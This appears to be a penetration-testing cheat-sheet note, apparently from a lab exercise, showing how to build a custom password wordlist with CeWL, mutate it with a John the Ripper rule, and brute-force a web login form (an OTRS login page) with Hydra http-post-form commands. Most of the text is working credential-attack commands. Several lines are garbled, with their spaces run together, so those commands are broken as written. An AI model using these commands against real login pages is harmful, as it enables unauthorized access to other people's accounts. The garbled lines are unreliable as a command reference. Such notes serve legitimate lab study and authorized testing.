The intent here is to create our own wordlist for a website/page we want to Bruteforce credentials (Not always rockyou.txt works so here we are)
Cewl + Hydra
# Create a Wordlist of a website and Put the whole path of the websitecewl-wwordlist.txt-d5http://<IP>/html5# Change -l user and pass, post request and Failed request, -s is for porthydra -l root@localhost -P wordlist.txt <IP> http-post-form "</otrs/index.pl>:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:Login Failed" -V
hydra -L ../usernames.txt -P /root/scripts/wordlist/CeWL/pw.txt 10.11.1.39 http-post-form "</otrs/index.pl>:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
# Creating a Wordlist with Cewlcewlwww.testwebsite.com-m6-wpass.txt# -m is min 6 length word# Creating wordlist + Adding a rule in Johntherippersudonano/etc/john/john.conf-> Addthisruleinlast,Addtwonumberstotheendofeachpassword$[0-9]$[0-9]
# Took the wordlist, added rules, and outputted in mutated.txt
john --wordlist=pass.txt --rules --stdout > mutated.txt